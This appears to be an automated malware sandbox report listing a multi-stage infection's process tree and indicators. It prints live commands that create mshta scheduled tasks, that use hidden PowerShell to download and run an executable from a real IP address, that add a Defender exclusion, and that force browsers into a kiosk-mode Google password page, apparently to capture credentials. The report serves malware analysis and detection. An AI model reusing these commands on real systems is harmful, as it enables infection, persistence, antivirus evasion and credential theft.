description pid Process Token: SeDebugPrivilege 3500 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 4960 powershell.exe Token: SeDebugPrivilege 3416 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 3624 w6swxRHYtZ.exe Token: SeDebugPrivilege 768 0b10c95dde.exe Token: SeDebugPrivilege 1412 ce4pMzk.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 4124 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 2540 taskkill.exe Token: SeDebugPrivilege 4500 taskkill.exe Token: SeDebugPrivilege 4368 firefox.exe Token: SeDebugPrivilege 4368 firefox.exe Token: SeDebugPrivilege 3640 6e8628d5ac.exe Token: SeDebugPrivilege 5636 powershell.exe Token: SeDebugPrivilege 3956 jfgGILHp7d.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 3512 2c6cf18ecd.exe 3512 2c6cf18ecd.exe 3512 2c6cf18ecd.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 3512 2c6cf18ecd.exe 3512 2c6cf18ecd.exe 3512 2c6cf18ecd.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4368 firefox.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe 4724 67b204910f.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4368 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3544 wrote to memory of 2476 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 87 PID 3544 wrote to memory of 2476 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 87 PID 3544 wrote to memory of 2476 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 87 PID 3544 wrote to memory of 3588 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 88 PID 3544 wrote to memory of 3588 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 88 PID 3544 wrote to memory of 3588 3544 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 88 PID 2476 wrote to memory of 672 2476 cmd.exe 90 PID 2476 wrote to memory of 672 2476 cmd.exe 90 PID 2476 wrote to memory of 672 2476 cmd.exe 90 PID 3588 wrote to memory of 3500 3588 mshta.exe 91 PID 3588 wrote to memory of 3500 3588 mshta.exe 91 PID 3588 wrote to memory of 3500 3588 mshta.exe 91 PID 3500 wrote to memory of 3240 3500 powershell.exe 100 PID 3500 wrote to memory of 3240 3500 powershell.exe 100 PID 3500 wrote to memory of 3240 3500 powershell.exe 100 PID 3240 wrote to memory of 1076 3240 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 101 PID 3240 wrote to memory of 1076 3240 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 101 PID 3240 wrote to memory of 1076 3240 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 101 PID 1076 wrote to memory of 3512 1076 rapes.exe 105 PID 1076 wrote to memory of 3512 1076 rapes.exe 105 PID 1076 wrote to memory of 3512 1076 rapes.exe 105 PID 3512 wrote to memory of 3840 3512 2c6cf18ecd.exe 106 PID 3512 wrote to memory of 3840 3512 2c6cf18ecd.exe 106 PID 3512 wrote to memory of 3840 3512 2c6cf18ecd.exe 106 PID 3512 wrote to memory of 1620 3512 2c6cf18ecd.exe 107 PID 3512 wrote to memory of 1620 3512 2c6cf18ecd.exe 107 PID 3512 wrote to memory of 1620 3512 2c6cf18ecd.exe 107 PID 3840 wrote to memory of 4456 3840 cmd.exe 109 PID 3840 wrote to memory of 4456 3840 cmd.exe 109 PID 3840 wrote to memory of 4456 3840 cmd.exe 109 PID 1620 wrote to memory of 1368 1620 mshta.exe 110 PID 1620 wrote to memory of 1368 1620 mshta.exe 110 PID 1620 wrote to memory of 1368 1620 mshta.exe 110 PID 1076 wrote to memory of 4936 1076 rapes.exe 112 PID 1076 wrote to memory of 4936 1076 rapes.exe 112 PID 1076 wrote to memory of 4936 1076 rapes.exe 112 PID 4936 wrote to memory of 4124 4936 cmd.exe 114 PID 4936 wrote to memory of 4124 4936 cmd.exe 114 PID 4936 wrote to memory of 4124 4936 cmd.exe 114 PID 1368 wrote to memory of 1944 1368 powershell.exe 115 PID 1368 wrote to memory of 1944 1368 powershell.exe 115 PID 1368 wrote to memory of 1944 1368 powershell.exe 115 PID 4936 wrote to memory of 4004 4936 cmd.exe 116 PID 4936 wrote to memory of 4004 4936 cmd.exe 116 PID 4936 wrote to memory of 4004 4936 cmd.exe 116 PID 4004 wrote to memory of 4960 4004 cmd.exe 117 PID 4004 wrote to memory of 4960 4004 cmd.exe 117 PID 4004 wrote to memory of 4960 4004 cmd.exe 117 PID 4936 wrote to memory of 4640 4936 cmd.exe 118 PID 4936 wrote to memory of 4640 4936 cmd.exe 118 PID 4936 wrote to memory of 4640 4936 cmd.exe 118 PID 4640 wrote to memory of 3416 4640 cmd.exe 119 PID 4640 wrote to memory of 3416 4640 cmd.exe 119 PID 4640 wrote to memory of 3416 4640 cmd.exe 119 PID 4936 wrote to memory of 1896 4936 cmd.exe 120 PID 4936 wrote to memory of 1896 4936 cmd.exe 120 PID 4936 wrote to memory of 1896 4936 cmd.exe 120 PID 1896 wrote to memory of 3696 1896 cmd.exe 121 PID 1896 wrote to memory of 3696 1896 cmd.exe 121 PID 1896 wrote to memory of 3696 1896 cmd.exe 121 PID 4936 wrote to memory of 3244 4936 cmd.exe 122 PID 4936 wrote to memory of 3244 4936 cmd.exe 122 PID 4936 wrote to memory of 3244 4936 cmd.exe 122 PID 4936 wrote to memory of 3976 4936 cmd.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 2Z1oFmaMcmS /tr "mshta C:\Users\Admin\AppData\Local\Temp\H5r7M8sf5.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 2Z1oFmaMcmS /tr "mshta C:\Users\Admin\AppData\Local\Temp\H5r7M8sf5.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:672
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\H5r7M8sf5.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Users\Admin\AppData\Local\TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE"C:\Users\Admin\AppData\Local\TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\10104610101\2c6cf18ecd.exe"C:\Users\Admin\AppData\Local\Temp\10104610101\2c6cf18ecd.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ZOQi0maWRXN /tr "mshta C:\Users\Admin\AppData\Local\Temp\SWWmBz7bY.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ZOQi0maWRXN /tr "mshta C:\Users\Admin\AppData\Local\Temp\SWWmBz7bY.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4456
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\SWWmBz7bY.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Users\Admin\AppData\Local\Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE"C:\Users\Admin\AppData\Local\Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1944
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "iEpMNmafFyS" /tr "mshta \"C:\Temp\ISJEwcLzv.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3244
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\ISJEwcLzv.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1992
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104820101\d7fb9061a7.exe"C:\Users\Admin\AppData\Local\Temp\10104820101\d7fb9061a7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1508
-
-
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"7⤵
- Executes dropped EXE
PID:3824
-
-
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"7⤵
- Executes dropped EXE
PID:1452
-
-
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"7⤵
- Executes dropped EXE
PID:852
-
-
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2152 -
C:\Users\Admin\AppData\Roaming\xb7PWZwMMv.exe"C:\Users\Admin\AppData\Roaming\xb7PWZwMMv.exe"8⤵
- Executes dropped EXE
PID:4640
-
-
C:\Users\Admin\AppData\Roaming\w6swxRHYtZ.exe"C:\Users\Admin\AppData\Roaming\w6swxRHYtZ.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 8327⤵
- Program crash
PID:3512
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104850101\cc9ac2900b.exe"C:\Users\Admin\AppData\Local\Temp\10104850101\cc9ac2900b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4500 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104860101\0b10c95dde.exe"C:\Users\Admin\AppData\Local\Temp\10104860101\0b10c95dde.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:768 -
C:\Users\Admin\AppData\Local\Temp\10104860101\0b10c95dde.exe"C:\Users\Admin\AppData\Local\Temp\10104860101\0b10c95dde.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 8127⤵
- Program crash
PID:5056
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104870101\d2cf0b8874.exe"C:\Users\Admin\AppData\Local\Temp\10104870101\d2cf0b8874.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1572 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3244
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104880101\45a1ed5133.exe"C:\Users\Admin\AppData\Local\Temp\10104880101\45a1ed5133.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4684
-
-
C:\Users\Admin\AppData\Local\Temp\10104890101\476de4addb.exe"C:\Users\Admin\AppData\Local\Temp\10104890101\476de4addb.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1468
-
-
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\atle11Vo\Anubis.exe""7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5636
-
-
C:\Users\Admin\AppData\Roaming\abVvFvr.exe"C:\Users\Admin\AppData\Roaming\abVvFvr.exe"7⤵
- Executes dropped EXE
PID:6060
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104920101\463d60b86f.exe"C:\Users\Admin\AppData\Local\Temp\10104920101\463d60b86f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3332 -
C:\Users\Admin\AppData\Local\Temp\JY4UKYPK97I92KKCAVXZYZOJ5.exe"C:\Users\Admin\AppData\Local\Temp\JY4UKYPK97I92KKCAVXZYZOJ5.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2516
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104930101\560405edac.exe"C:\Users\Admin\AppData\Local\Temp\10104930101\560405edac.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2508
-
-
C:\Users\Admin\AppData\Local\Temp\10104940101\67b204910f.exe"C:\Users\Admin\AppData\Local\Temp\10104940101\67b204910f.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4724 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:3888
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4368 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 27454 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d4c4681-73f4-4785-a78a-975c673efb1d} 4368 "\\.\pipe\gecko-crash-server-pipe.4368" gpu9⤵PID:4188
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 28374 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {209eefb5-642e-49c5-971a-cf49d4e713d0} 4368 "\\.\pipe\gecko-crash-server-pipe.4368" socket9⤵PID:1164
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3224 -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3128 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ccad531e-0b92-4d28-b4de-582ad45484f2} 4368 "\\.\pipe\gecko-crash-server-pipe.4368" tab9⤵PID:992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=888 -childID 2 -isForBrowser -prefsHandle 1240 -prefMapHandle 2568 -prefsLen 32864 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {16dccd7a-0e60-4e2a-8bbf-477594b2d704} 4368 "\\.\pipe\gecko-crash-server-pipe.4368" tab9⤵PID:3432
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4720 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4812 -prefMapHandle 4808 -prefsLen 32864 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2ffd03b-f813-445d-acde-eafb2460e3b5} 4368 "\\.\pipe\gecko-crash-server-pipe.4368" utility9⤵
- Checks processor information in registry
PID:1468
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5364 -childID 3 -isForBrowser -prefsHandle 5356 -prefMapHandle 5340 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c5e962f5-46b3-4699-8fe8-5579d003927a} 4368 "\\.\pipe\gecko-crash-server-pipe.4368" tab9⤵PID:5840
-
-
